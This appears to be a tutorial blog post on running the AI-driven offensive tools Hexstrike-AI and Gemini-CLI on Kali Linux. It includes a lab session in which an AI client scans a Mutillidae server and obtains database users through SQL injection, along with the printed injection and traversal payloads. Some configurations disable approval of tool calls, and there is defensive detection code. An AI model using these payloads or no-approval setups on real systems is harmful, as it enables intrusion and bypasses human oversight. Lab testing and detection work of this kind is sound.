Author: Arnel C. Reyes
Published: 22 October 2025
Last Updated: 22 October 2025
Artificial intelligence is redefining offensive security, and Hexstrike-AI and Gemini-CLI are at the forefront of this transformation. Both tools leverage AI to enhance penetration testing workflows on Kali Linux, but they do so in distinct ways. Hexstrike-AI focuses on exploit generation and post-exploitation automation, streamlining complex attack chains through intelligent orchestration. Gemini-CLI, meanwhile, integrates large language model capabilities directly into the terminal, enabling AI-assisted reconnaissance, payload crafting, and adaptive attack strategies.
Together, these tools represent the next evolution of the red-team and penetration testing landscape—where human expertise is amplified by machine intelligence, and the boundaries of automation are continually expanding.
Background
The offensive side of cybersecurity is undergoing a shift. Traditionally, penetration testing relied heavily on manual enumeration, scripting and deep domain knowledge. With systems growing more complex and threat surfaces expanding, there’s an increasing need for automation that isn’t just “run this script” — but “intelligently adapt to what the system gives you.”
In this context:
- Hexstrike-AI brings in neural- or model-based steps to autonomously pick exploit paths, deliver payloads and escalate privileges.
- Gemini-CLI takes a different tack, using AI to assist in reconnaissance, make sense of system responses, refine attack vectors and craft more effective payloads.
Both tools represent a significant shift in how penetration testing is performed. Instead of static checklists or prebuilt scripts, AI is now bringing context-aware adaptability to the attacker’s toolkit. Kali Linux provides the ideal sandbox — flexible, open, and battle-tested — for experimenting with these next-generation offensive systems. Running on Kali Linux gives penetration testers and red-teamers a familiar environment to test these next-gen tools.
Preparing Kali Linux
Kali Linux is a powerful Debian-based penetration testing distribution packed with security tools. It can be run in a virtual machine (VM) or in a Docker container.
Option A: Running Kali Linux on a Virtual Machine
- Download the official Kali Linux image
  Go to the official site: https://www.kali.org/get-kali/
  - VMware Image (.ova)
  - VirtualBox Image (.ova)
  - ISO (for manual installation)
- Import Kali into your virtualization software
  - For VirtualBox:
    1. Open VirtualBox → File → Import Appliance
    2. Select the .ova file
    3. Click Import
  - For VMware:
    1. Open VMware Workstation or Fusion → File → Open
    2. Select the .ova file
    3. Click Import
- Start Kali Linux
  Default credentials (from official images):
  Username: kali
  Password: kali
- After login, update everything:
  $ sudo apt update && sudo apt full-upgrade -y
- (Optional) Install full suite of tools
  $ sudo apt install -y kali-linux-full
  > Installs all tools.
  > If you prefer just the top tools:
  $ sudo apt install -y kali-linux-top10
kali-linux-top10 is a metapackage that pulls in the 10 most important Kali tools. Installing it will install these packages:
- aircrack-ng — wireless LAN (WEP/WPA) cracking suite
- burpsuite — web application testing proxy / scanner (community or bundled edition)
- hydra — fast network login cracker (password brute force)
- john — John the Ripper, password-cracking suite
- metasploit-framework — exploitation framework (msfconsole, modules, etc.)
- netexec — small remote command execution helper (used in some pentest workflows)
- nmap — network scanner / port scanner / host discovery
- responder — LLMNR/NBT-NS/mDNS poisoning and credential capture tool
- sqlmap — automated SQL injection and database takeover tool
- wireshark — network protocol analyzer / packet capture GUI
Option B: Running Kali Linux on a Docker Container
- Pull the official Kali Linux image
  $ docker pull kalilinux/kali-rolling
- Run an interactive Kali container
  $ docker run -it --name mykali kalilinux/kali-rolling /bin/bash
  Expose ports if needed (for the Hexstrike-AI MCP server)
  Example: Expose Hexstrike-AI on port 8888
  $ docker run -it -p 8888:8888 --name mykali kalilinux/kali-rolling /bin/bash
- Update packages
  $ apt update && apt full-upgrade -y
- Install essential tools
  For top tools:
  $ apt install -y kali-linux-top10
  Or full suite:
  $ apt install -y kali-linux-full
  Or everything:
  $ apt install -y kali-linux-everything
  Warning: This will take time and disk space (20–40 GB).
- Add networking tools
  $ apt install -y net-tools iproute2 traceroute dnsutils ethtool wireless-tools arp-scan curl wget
- Install pip3 if needed
  $ apt install -y python3-pip
- Save and reuse by keeping the container persistent
  To keep tools and data after exiting, commit the container to an image:
  $ docker commit mykali mykali-custom
  Next time, just run:
  $ docker run -it --name kali mykali-custom /bin/bash
- If you prefer a custom Kali image with preinstalled tools:
  Create a Dockerfile:
```Dockerfile
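# Start from the official rolling-release Kali base image
FROM kalilinux/kali-rolling
# Install the scanning, exploitation and networking tools in a single layer
RUN apt update && apt install -y \
    nmap \
    metasploit-framework \
    sqlmap \
    hydra \
    nikto \
    net-tools \
    iputils-ping \
    iproute2 \
    traceroute \
    dnsutils \
    ethtool \
    wireless-tools \
    arp-scan \
    gemini-cli \
    && apt clean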
```
Then build it:
$ docker build -t mykali .
Then run it (naming the container so it can be restarted later):
$ docker run -it --name mykali mykali
Next time, run using the following:
$ docker start -i mykali
Interact with running container:
$ docker exec -it mykali /bin/bash
Hexstrike-AI is purpose-built to automate offensive workflows end-to-end. It offers a multi-agent architecture, tying large language models (LLMs) like GPT or Claude into a decision-engine that orchestrates over 150 professional security tools (scanning, exploitation, payload delivery, binary & web apps) in a unified framework. Because of this high level of automation, the tool is already attracting attention — both from red teams and, unfortunately, threat actors. For example, it reportedly reduced the time-to-exploit for certain CVEs from days to under 10 minutes.
Setting-Up Hexstrike-AI on Kali
- Clone the repository
  $ git clone https://github.com/0x4m4/hexstrike-ai.git
  $ cd hexstrike-ai
- Set up a virtual environment
  Install the venv package:
  $ apt -y install python3.13-venv
  Create and activate the virtual environment:
  $ python3 -m venv hexstrike-env
  $ source hexstrike-env/bin/activate # Linux/Mac
  # hexstrike-env\Scripts\activate # Windows
- Install Python dependencies
  $ apt install -y python3-pip
  $ pip3 install -r requirements.txt
- Start the backend Hexstrike-AI agent server
  $ python3 hexstrike_server.py
  # Optional: Start with debug mode
  $ python3 hexstrike_server.py --debug
  # Optional: Custom port configuration
  $ python3 hexstrike_server.py --port 8888
  If the backend agent server is set up successfully, it starts listening:
2025-10-22 13:38:55,417 - __main__ - INFO - 🔧 Process pool worker 0 started
2025-10-22 13:38:55,419 - __main__ - INFO - 🔧 Process pool worker 1 started
2025-10-22 13:38:55,420 - __main__ - INFO - 🔧 Process pool worker 2 started
2025-10-22 13:38:55,421 - __main__ - INFO - 🔧 Process pool worker 3 started
██╗ ██╗███████╗██╗ ██╗███████╗████████╗██████╗ ██╗██╗ ██╗███████╗
██║ ██║██╔════╝╚██╗██╔╝██╔════╝╚══██╔══╝██╔══██╗██║██║ ██╔╝██╔════╝
███████║█████╗ ╚███╔╝ ███████╗ ██║ ██████╔╝██║█████╔╝ █████╗
██╔══██║██╔══╝ ██╔██╗ ╚════██║ ██║ ██╔══██╗██║██╔═██╗ ██╔══╝
██║ ██║███████╗██╔╝ ██╗███████║ ██║ ██║ ██║██║██║ ██╗███████╗
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═╝╚══════╝
┌─────────────────────────────────────────────────────────────────────┐
│ 🚀 HexStrike AI - Blood-Red Offensive Intelligence Core │
│ ⚡ AI-Automated Recon | Exploitation | Analysis Pipeline │
│ 🎯 Bug Bounty | CTF | Red Team | Zero-Day Research │
└─────────────────────────────────────────────────────────────────────┘
[INFO] Server starting on 127.0.0.1:8888
[INFO] 150+ integrated modules | Adaptive AI decision engine active
[INFO] Blood-red theme engaged – unified offensive operations UI
2025-10-22 13:38:55,499 - __main__ - INFO - ╭───────────────────────────────────────────╮
2025-10-22 13:38:55,499 - __main__ - INFO - │ 🚀 Starting HexStrike AI Tools API Server │
2025-10-22 13:38:55,500 - __main__ - INFO - ├───────────────────────────────────────────┤
2025-10-22 13:38:55,500 - __main__ - INFO - │ 🌐 Port: 8888 │
2025-10-22 13:38:55,500 - __main__ - INFO - │ 🔧 Debug Mode: False │
2025-10-22 13:38:55,501 - __main__ - INFO - │ 💾 Cache Size: 1000 | TTL: 3600s │
2025-10-22 13:38:55,501 - __main__ - INFO - │ ⏱️ Command Timeout: 300s │
2025-10-22 13:38:55,501 - __main__ - INFO - │ ✨ Enhanced Visual Engine: Active │
2025-10-22 13:38:55,501 - __main__ - INFO - ╰───────────────────────────────────────────╯
* Serving Flask app 'hexstrike_server'
* Debug mode: off
2025-10-22 13:38:55,515 - werkzeug - INFO - WARNING: This is a development server. Do not
use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on http://127.0.0.1:8888
* Running on http://172.17.0.2:8888
2025-10-22 13:38:55,515 - werkzeug - INFO - Press CTRL+C to quit
- Verify Installation
# Test server health
$ curl http://localhost:8888/health
# Test AI agent capabilities
$ curl -X POST http://localhost:8888/api/intelligence/analyze-target \
-H "Content-Type: application/json" \
-d '{"target": "example.com", "analysis_type": "comprehensive"}'
Setting-Up Hexstrike-AI on AI Client
Option A: Claude
- Download and install Claude
  Go to: https://claude.com/download
- Once installed, log in using a Claude account
  To configure:
  - Go to Settings → Developer → Local MCP Servers
  - Click Edit Config
  - Edit ~/claude/claude_desktop_config.json
```json
{
  "mcpServers": {
    "hexstrike-ai": {
      "command": "python",
      "args": [
        "/path-to/hexstrike-ai/hexstrike_mcp.py",
        "--server",
        "http://ip-address-of-hexstrike-ai-backend-server:8888"
      ]
    }
  }
}
```
- Restart Claude
- Once Claude is restarted, the hexstrike-ai tool should be available in the tools list
- The AI client is ready to receive prompts to interact with Hexstrike-AI to perform security tests
Option B: Cursor
- Download and install Cursor
  Go to: https://cursor.com/download
- Once installed, log in using a Cursor account
  To configure:
  - Open Settings (Ctrl+Shift+J) → Tools & MCP → Tools
  - Click New MCP Server
  - Edit ~/.cursor/mcp.json
```json
{
  "mcpServers": {
    "hexstrike-ai": {
      "command": "python",
      "args": [
        "/path-to/hexstrike-ai/assets/hexstrike_mcp.py",
        "--server",
        "http://ip-address-of-hexstrike-ai-backend-server:8888"
      ],
      "description": "HexStrike AI v6.0 - Advanced Cybersecurity Automation Platform",
      "timeout": 700,
      "disabled": false
    }
  }
}
```
- The AI client is ready to receive prompts to interact with Hexstrike-AI to perform security tests
Option C: 5ire
- Download and install 5ire
  Go to: https://5ire.app/
- Once installed, log in using a 5ire account
  To configure:
  - Go to Tools → Tools
  - Click + Local
  - Enter the following:
    Tool Key: hexstrike
    Name: hexstrike
    Approval Policy: Never
    Command: python /path-to/hexstrike-ai/hexstrike_mcp.py --server http://ip-address-of-hexstrike-ai-backend-server:8888
    Config Preview:
```json
{
  "name": "hexstrike",
  "key": "hexstrike",
  "description": "hexstrike",
  "command": "python",
  "args": [
    "/path-to/hexstrike-ai/hexstrike_mcp.py",
    "--server",
    "http://ip-address-of-hexstrike-ai-backend-server:8888"
  ],
  "approvalPolicy": "never"
}
```
  - Click Save
- The AI client is ready to receive prompts to interact with Hexstrike-AI to perform security tests
More details about Hexstrike-AI: https://github.com/0x4m4/hexstrike-ai
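All three client configurations above point hexstrike_mcp.py at a plain http:// backend, and the 5ire one sets approvalPolicy to never. As an added example (not code from the HexStrike project or from any of the clients), this Python check reads a client config in either shape shown above and flags both conditions; the sample configs, the address 198.51.100.20 and the finding strings are constructed assumptions.

```python
import ipaddress
import json
from urllib.parse import urlparse

CLEARTEXT_REMOTE = "cleartext HTTP to a non-loopback backend"
NO_APPROVAL = "approval prompts disabled (approvalPolicy=never)"

# Constructed sample in the nested "mcpServers" shape used by the Claude and
# Cursor configs above; 198.51.100.20 is a documentation address.
CURSOR_STYLE = """
{
  "mcpServers": {
    "hexstrike-ai": {
      "command": "python",
      "args": ["/path-to/hexstrike-ai/hexstrike_mcp.py",
               "--server", "http://198.51.100.20:8888"],
      "timeout": 700,
      "disabled": false
    }
  }
}
"""

# Constructed sample in the flat shape of the 5ire "Config Preview" above.
FIVEIRE_STYLE = """
{
  "name": "hexstrike",
  "key": "hexstrike",
  "command": "python",
  "args": ["/path-to/hexstrike-ai/hexstrike_mcp.py",
           "--server", "http://127.0.0.1:8888"],
  "approvalPolicy": "never"
}
"""


def server_url(args):
    """Return the URL passed via --server in the launcher's args, or None."""
    for i, arg in enumerate(args):
        if arg == "--server" and i + 1 < len(args):
            return args[i + 1]
        if arg.startswith("--server="):
            return arg.split("=", 1)[1]
    return None


def is_loopback(host):
    """True only when the host is provably local (localhost or a loopback IP)."""
    if not host:
        return False
    if host.lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False  # DNS name or unfilled placeholder: treat as remote


def entries(cfg):
    """Yield (name, entry) for the nested mcpServers shape and the flat shape."""
    if isinstance(cfg.get("mcpServers"), dict):
        yield from cfg["mcpServers"].items()
    elif "command" in cfg:
        yield cfg.get("key") or cfg.get("name") or "unnamed", cfg


def audit_mcp_config(text):
    """Return a sorted list of (server_name, finding) for one client config."""
    findings = []
    for name, entry in entries(json.loads(text)):
        url = server_url(entry.get("args", []))
        if url is not None:
            parsed = urlparse(url)
            # The startup log above shows the backend "Running on all
            # addresses (0.0.0.0)", so a non-loopback http:// URL means tool
            # requests and results cross the network unencrypted.
            if parsed.scheme != "https" and not is_loopback(parsed.hostname):
                findings.append((name, CLEARTEXT_REMOTE))
        # Assumption: "never" means the client never asks before a tool call.
        if str(entry.get("approvalPolicy", "")).lower() == "never":
            findings.append((name, NO_APPROVAL))
    return sorted(findings)


if __name__ == "__main__":
    for label, sample in (("cursor-style", CURSOR_STYLE), ("5ire-style", FIVEIRE_STYLE)):
        for server, finding in audit_mcp_config(sample):
            print(f"{label}: {server}: {finding}")
```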
AI Client Used: Cursor
Vulnerable Test Server: Mutillidae
Prompts Used:
- are you connected to hexstrike-ai mcp server?
- run nmap to discover live hosts in 192.168.0.0 network that are listening on port 80 or 443
- run nikto for 192.168.0.152
- run sqlmap for the login page to detect sql injection and try to discover databases and users on the sql server.
User:
are you connected to hexstrike-ai mcp server?

------------------------------------------------------------------------

Cursor:
Yes, I am connected to the HexStrike-AI MCP server! I can see all the available tools and functions from the HexStrike-AI server in my available tools list. This includes a comprehensive suite of cybersecurity and penetration testing tools such as:

Network Scanning & Reconnaissance:
- Nmap scanning (basic and advanced)
- Rustscan for fast port scanning
- Masscan for high-speed scanning
- AutoRecon for comprehensive reconnaissance
- ARP scanning and network discovery

Web Application Security:
- Gobuster, Dirb, FFuf for directory enumeration
- Nikto, Nuclei for vulnerability scanning
- SQLMap, XSSer, Dalfox for specific attack vectors
- Burp Suite and OWASP ZAP integration
- API fuzzing and GraphQL scanning

Cloud Security:
- Prowler for AWS security assessment
- Scout Suite for multi-cloud analysis
- CloudMapper for AWS network visualization
- Pacu for AWS exploitation

Container & Kubernetes Security:
- Trivy for vulnerability scanning
- Kube-hunter for Kubernetes penetration testing
- Kube-bench for CIS benchmarks
- Docker Bench for Security

Binary Analysis & Reverse Engineering:
- GDB, Radare2, Ghidra analysis
- Pwntools for exploit development
- ROPgadget, Ropper for ROP chain building
- Volatility for memory forensics

Password Attacks & Cracking:
- Hydra, Hashcat, John the Ripper
- Custom payload generation

And many more specialized tools for various aspects of cybersecurity testing and analysis. Would you like me to help you with any specific security testing tasks or demonstrations of these capabilities?

------------------------------------------------------------------------

User:
run nmap to discover live hosts in 192.168.0.0 network that are listening on port 80 or 443

------------------------------------------------------------------------

Cursor:
I’ll run an Nmap scan to discover live hosts in the 192.168.0.0 network that are listening on ports 80 or 443.

Great! The Nmap scan has completed successfully. Here are the results:

Live Hosts with Ports 80/443 Open

2 hosts found with both HTTP (port 80) and HTTPS (port 443) services running:

1. 192.168.0.1
   - Port 80: HTTP (open)
   - Port 443: HTTPS (open)
   - MAC Address: A4:56:CC:1A:30:9A (Technicolor CH USA)
   - Response time: 0.039s
2. 192.168.0.152
   - Port 80: HTTP (open)
   - Port 443: HTTPS (open)
   - MAC Address: D4:6A:6A:A1:4C:21 (Hon Hai Precision Ind.)
   - Response time: 0.001s (very fast response)

Scan Summary
- Total hosts scanned: 256 IP addresses (192.168.0.0/24 network)
- Live hosts discovered: 9 hosts total
- Hosts with web services: 2 hosts
- Scan duration: 10.12 seconds

The scan used a SYN scan (-sS) which is stealthy and efficient for discovering open ports. Both discovered hosts appear to be running web servers, with 192.168.0.1 likely being a router/gateway device (Technicolor) and 192.168.0.152 potentially being a computer or network device (Hon Hai Precision).

Would you like me to perform additional reconnaissance on these hosts, such as service version detection or web application scanning?

------------------------------------------------------------------------

User:
run nikto for 192.168.0.152

------------------------------------------------------------------------

Cursor:
I’ll run Nikto to perform a web vulnerability scan on 192.168.0.152.

The Nikto scan has completed successfully and revealed numerous security vulnerabilities on 192.168.0.152. Here’s a comprehensive analysis of the findings:

🚨 Critical Security Issues Found

Server Information
- Web Server: Apache/2.4.65 (Debian)
- PHP Version: 8.4.13
- Scan Duration: 53 seconds
- Total Issues: 145 vulnerabilities detected

🔴 HIGH SEVERITY VULNERABILITIES

1. Remote File Inclusion (RFI) Vulnerabilities
   - Multiple RFI vulnerabilities detected across various parameters
   - Examples include parameters like page, config, abs_path, includeDir, etc.
   - Impact: Allows attackers to include and execute remote files
2. Local File Inclusion (LFI)
   - /index.php?page=../../../../../../../../../../etc/passwd - Directory traversal vulnerability
   - Impact: Can potentially read system files like /etc/passwd
3. Information Disclosure
   - /phpinfo.php - PHP configuration exposed
   - Impact: Reveals system information, paths, and configuration details

🟡 MEDIUM SEVERITY ISSUES

4. Directory Indexing
   - Multiple directories allow listing: /data/, /includes/, /passwords/, /images/, /styles/, /webservices/
   - Impact: Information disclosure of directory contents
5. Security Headers Missing
   - Missing X-Frame-Options header (clickjacking protection)
   - Missing X-Content-Type-Options header
   - Impact: Increased risk of clickjacking and MIME type confusion
6. Cookie Security Issues
   - Cookies PHPSESSID and showhints lack HttpOnly flag
   - Impact: Potential XSS attacks via cookie access

🟢 LOW SEVERITY ISSUES

7. Administrative Interface
   - /login.php - Admin login page detected
   - /robots.txt - Contains 7 entries that should be reviewed
8. Uncommon Headers
   - logged-in-user header found (may indicate custom authentication)

📊 Risk Assessment Summary

| Vulnerability Type | Count | Risk Level |
|---|---|---|
| Remote File Inclusion | 100+ | CRITICAL |
| Local File Inclusion | 1 | HIGH |
| Information Disclosure | 3 | MEDIUM |
| Directory Indexing | 6 | MEDIUM |
| Security Headers | 2 | MEDIUM |
| Cookie Issues | 2 | LOW |

🛡️ Immediate Recommendations
1. URGENT: Fix all Remote File Inclusion vulnerabilities
2. URGENT: Remove or secure /phpinfo.php
3. HIGH: Implement proper input validation and sanitization
4. HIGH: Add security headers (X-Frame-Options, X-Content-Type-Options)
5. MEDIUM: Disable directory indexing
6. MEDIUM: Set HttpOnly flag on cookies
7. LOW: Review /robots.txt entries

This web application appears to be severely vulnerable and should not be exposed to the internet without immediate remediation of the critical RFI and LFI vulnerabilities.

------------------------------------------------------------------------

User:
run sqlmap for the login page to detect sql injection and try to discover databases and users on the sql server.

------------------------------------------------------------------------

Cursor:
I’ll run SQLMap to test for SQL injection vulnerabilities on the target URL and attempt to discover databases and users. I’ll use the parameters you specified with some additional options for comprehensive testing.

Excellent! SQLMap has successfully identified SQL injection vulnerabilities and discovered critical information about the target database. Here’s a comprehensive analysis of the findings:

🚨 SQL INJECTION VULNERABILITIES CONFIRMED

Target Information
- URL: http://192.168.0.152/index.php?page=login.php
- Vulnerable Parameter: username (POST parameter)
- Database System: MySQL >= 5.0 (MariaDB fork)
- Web Server: Apache 2.4.65 on Linux Debian
- PHP Version: 8.4.13

🔴 CRITICAL: Multiple SQL Injection Types Detected

SQLMap identified 3 different types of SQL injection vulnerabilities:

1. Boolean-based Blind SQL Injection
   - Payload: username=-3623' OR 1091=1091#&password=test&login-php-submit-button=Login
   - Type: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
2. Error-based SQL Injection
   - Payload: username=test' OR (SELECT 9395 FROM(SELECT COUNT(*),CONCAT(0x716b626271,(SELECT (ELT(9395=9395,1))),0x716b627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OYNW&password=test&login-php-submit-button=Login
   - Type: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
3. Time-based Blind SQL Injection
   - Payload: username=test' AND (SELECT 1611 FROM (SELECT(SLEEP(5)))sCUm)-- ReTq&password=test&login-php-submit-button=Login
   - Type: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

👥 Database Users Discovered (6 users)

| Username | Host | Purpose |
|---|---|---|
| healthcheck | 127.0.0.1 | Health monitoring |
| healthcheck | ::1 | Health monitoring (IPv6) |
| healthcheck | localhost | Health monitoring |
| mariadb.sys | localhost | System user |
| root | % | ⚠️ ROOT ACCESS FROM ANY HOST |
| root | localhost | Root user |

🗄️ Databases Discovered (5 databases)

| Database Name | Purpose |
|---|---|
| information_schema | MySQL system schema |
| mutillidae | ⚠️ Likely vulnerable web application database |
| mysql | MySQL system database |
| performance_schema | MySQL performance monitoring |
| sys | MySQL system database |

🚨 CRITICAL SECURITY FINDINGS

1. Root Access from Any Host
   - User root@% has administrative privileges from ANY host
   - This is extremely dangerous and should be immediately restricted
2. Mutillidae Database
   - This appears to be a vulnerable web application database (Mutillidae is a deliberately vulnerable web app)
   - Likely contains application data and potentially sensitive information
3. Multiple Injection Vectors
   - The application is vulnerable to 3 different types of SQL injection
   - This provides attackers with multiple attack vectors

📊 Risk Assessment

| Risk Level | Count | Details |
|---|---|---|
| CRITICAL | 3 | Multiple SQL injection types |
| HIGH | 1 | Root access from any host |
| MEDIUM | 1 | Mutillidae application database |

🛡️ Immediate Remediation Steps
1. URGENT: Fix SQL injection vulnerabilities in login form
2. URGENT: Restrict root user access to localhost only
3. HIGH: Implement proper input validation and parameterized queries
4. HIGH: Review and secure the mutillidae database
5. MEDIUM: Audit all database user permissions
6. MEDIUM: Implement database access logging

📁 Data Location

All extracted data has been saved to: /root/.local/share/sqlmap/output/192.168.0.152

This target is severely compromised with multiple critical SQL injection vulnerabilities that provide full database access. Immediate remediation is required to prevent further exploitation.
Note: The test was performed in a private, isolated lab environment as a proof-of-concept to evaluate Hexstrike-AI's effectiveness in penetration-testing workflows. All tests were authorized, reproducible, contained, and confined to isolated systems; no production or third-party systems were involved.
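The scans in the session above leave a recognizable trail on the target: the Nikto run sends the page=../…/etc/passwd traversal and places a remote URL in many different parameter names from one source. As an added example (not part of the original article or of either tool), this Python detector flags those patterns in Apache combined-format access logs; the sample log lines, addresses, INCLUDE_PARAMS and the SPRAY_MIN threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache "combined" log lines (documentation addresses, not lab data).
SAMPLE_LOG = """\
198.51.100.50 - - [22/Oct/2025:13:40:01 -0400] "GET /index.php?page=home.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.77 - - [22/Oct/2025:13:41:10 -0400] "GET /index.php?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843 "-" "scanner"
198.51.100.77 - - [22/Oct/2025:13:41:10 -0400] "GET /index.php?page=http://files.example.test/inc.txt? HTTP/1.1" 200 4096 "-" "scanner"
198.51.100.77 - - [22/Oct/2025:13:41:11 -0400] "GET /index.php?theme=http://files.example.test/inc.txt HTTP/1.1" 200 4096 "-" "scanner"
198.51.100.77 - - [22/Oct/2025:13:41:11 -0400] "GET /index.php?template=http://files.example.test/inc.txt? HTTP/1.1" 200 4096 "-" "scanner"
198.51.100.77 - - [22/Oct/2025:13:41:30 -0400] "GET /index.php?page=user-info.php&username=x%27%20OR%207%3D7%23 HTTP/1.1" 200 5300 "-" "scanner"
198.51.100.50 - - [22/Oct/2025:13:42:00 -0400] "GET /index.php?page=login.php&next=https%3A%2F%2Fexample.test%2F HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.I)
TRAVERSAL_RE = re.compile(r"(?:\.\./){2,}")
# Shapes of the three injection types reported in the session above. Those
# requests were POSTs, so this rule only fires where parameters are logged
# (query strings here, or a body/audit log fed through the same function).
SQLI_RE = re.compile(
    r"'\s*(?:or|and)\s+\d+\s*=\s*\d+|sleep\(\s*\d+\s*\)|floor\(rand\(", re.I
)

INCLUDE_PARAMS = {"page"}  # assumption: parameters the app feeds to include()
SPRAY_MIN = 3              # assumption: distinct names before calling it a spray


def analyze(log_text):
    """Map each source address to the sorted list of rules it triggered."""
    findings = defaultdict(set)       # source -> rule names
    remote_params = defaultdict(set)  # source -> param names carrying a URL
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        source, target, _status = match.groups()
        query = urlsplit(target).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)  # second decode catches %252F-style input
            if TRAVERSAL_RE.search(value):
                findings[source].add("path-traversal")
            if SQLI_RE.search(value):
                findings[source].add("sqli-probe")
            if REMOTE_RE.match(value):
                remote_params[source].add(name)
                if name in INCLUDE_PARAMS:
                    findings[source].add("remote-include")
    # One legitimate redirect parameter (next=https://...) is not an alert;
    # the same source putting URLs in many parameter names is.
    for source, names in remote_params.items():
        if len(names) >= SPRAY_MIN:
            findings[source].add("rfi-parameter-spray")
    return {source: sorted(rules) for source, rules in findings.items()}


if __name__ == "__main__":
    for source, rules in analyze(SAMPLE_LOG).items():
        print(source, ", ".join(rules))
```

The default access log records query strings only, so the sqli-probe rule needs request-body logging to see the login-form injections from the session above.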
Gemini-CLI is listed in the Kali tools repository as an open-source AI agent (or interface) package:
“This package contains an open-source AI agent that brings the power of Gemini directly into your terminal.”
It’s not necessarily a full offensive-security framework in its own right but rather a command-line interface to the Gemini model embedded into Kali. You can invoke it with commands like gemini-cli -p/--prompt to issue prompts directly or launch interactive shells.
Its value in the offensive-security context comes from enabling an LLM inside your Kali terminal environment — which pentesters can use for reasoning, payload crafting, reconnaissance brainstorming, or translating natural language prompts into technical commands.
Setting-Up Gemini-CLI on Kali
- Install gemini-cli
  This package contains an open-source AI agent that brings the power of Gemini directly into the terminal. It provides lightweight access to Gemini, giving the most direct path from your prompt to the model.
  $ apt install -y gemini-cli
- Check gemini-cli usage
  $ gemini-cli -h
Usage: gemini [options] [command]
Gemini CLI - Launch an interactive CLI, use -p/--prompt for non-interactive mode
Commands:
gemini Launch Gemini CLI [default]
gemini mcp Manage MCP servers
Options:
-m, --model Model [string]
-p, --prompt Prompt. Appended to input on stdin (if any). [string]
-i, --prompt-interactive Execute the provided prompt and continue in interactive mode [string]
-s, --sandbox Run in sandbox? [boolean]
--sandbox-image Sandbox image URI. [string]
-d, --debug Run in debug mode? [boolean] [default: false]
-a, --all-files Include ALL files in context? [boolean] [default: false]
--all_files Include ALL files in context? [deprecated: Use --all-files instead. We will be removing --all_files in the coming weeks.] [boolean] [default: false]
--show-memory-usage Show memory usage in status bar [boolean] [default: false]
--show_memory_usage Show memory usage in status bar [deprecated: Use --show-memory-usage instead. We will be removing --show_memory_usage in the coming weeks.] [boolean] [default: false]
-y, --yolo Automatically accept all actions (aka YOLO mode, see https://www.youtube.com/watch?v=xvFZjo5PgG0 for more details)? [boolean] [default: false]
--approval-mode Set the approval mode: default (prompt for approval), auto_edit (auto-approve edit tools), yolo (auto-approve all tools) [string] [choices: "default", "auto_edit", "yolo"]
--telemetry Enable telemetry? This flag specifically controls if telemetry is sent. Other --telemetry-* flags set specific values but do not enable telemetry on their own. [boolean]
--telemetry-target Set the telemetry target (local or gcp). Overrides settings files. [string] [choices: "local", "gcp"]
--telemetry-otlp-endpoint Set the OTLP endpoint for telemetry. Overrides environment variables and settings files. [string]
--telemetry-log-prompts Enable or disable logging of user prompts for telemetry. Overrides settings files. [boolean]
--telemetry-outfile Redirect all telemetry output to the specified file. [string]
-c, --checkpointing Enables checkpointing of file edits [boolean] [default: false]
--experimental-acp Starts the agent in ACP mode [boolean]
--allowed-mcp-server-names Allowed MCP server names [array]
-e, --extensions A list of extensions to use. If not provided, all extensions are used. [array]
-l, --list-extensions List all available extensions and exit. [boolean]
--proxy Proxy for gemini client, like schema://user:password@host:port [string]
--include-directories Additional directories to include in the workspace (comma-separated or multiple --include-directories) [array]
-v, --version Show version number [boolean]
-h, --help Show help [boolean]
- Run gemini-cli
  $ gemini-cli
  Once gemini-cli is running, it will provide options to log in.
███ █████████ ██████████ ██████ ██████ █████ ██████ █████ █████
░░░███ ███░░░░░███░░███░░░░░█░░██████ ██████ ░░███ ░░██████ ░░███ ░░███
░░░███ ███ ░░░ ░███ █ ░ ░███░█████░███ ░███ ░███░███ ░███ ░███
░░░███ ░███ ░██████ ░███░░███ ░███ ░███ ░███░░███░███ ░███
███░ ░███ █████ ░███░░█ ░███ ░░░ ░███ ░███ ░███ ░░██████ ░███
███░ ░░███ ░░███ ░███ ░ █ ░███ ░███ ░███ ░███ ░░█████ ░███
███░ ░░█████████ ██████████ █████ █████ █████ █████ ░░█████ █████
░░░ ░░░░░░░░░ ░░░░░░░░░░ ░░░░░ ░░░░░ ░░░░░ ░░░░░ ░░░░░ ░░░░░
Tips for getting started:
1. Ask questions, edit files, or run commands.
2. Be specific for the best results.
3. Create GEMINI.md files to customize your interactions with Gemini.
4. /help for more information.
╭───────────────────────────────────────────────────────────────────────────────╮
│ │
│ Get started │
│ │
│ How would you like to authenticate for this project? │
│ │
│ ● 1. Login with Google │
│ 2. Use Gemini API Key │
│ 3. Vertex AI │
│ │
│ No authentication method selected. │
│ │
│ (Use Enter to select) │
│ │
│ Terms of Services and Privacy Notice for Gemini CLI │
│ │
│ https://github.com/google-gemini/gemini-cli/blob/main/docs/tos-privacy.md │
│ │
╰───────────────────────────────────────────────────────────────────────────────╯
----------------------------------------------------------------
Logging in with Google... Please restart Gemini CLI to continue.
----------------------------------------------------------------
If Login with Google is selected, restart gemini-cli; the following steps then authenticate you with Google credentials:
- The CLI will open a browser window (or provide a URL) to authenticate with Gmail.
- Sign in with a Gmail account (new or the same one).
- Once done, Gemini stores a new token locally.
  Note: To log out or clear the existing Gmail session:
  $ rm -rf ~/.config/gemini
  $ rm -rf ~/.gemini
- After successful authentication, the prompt will be available.
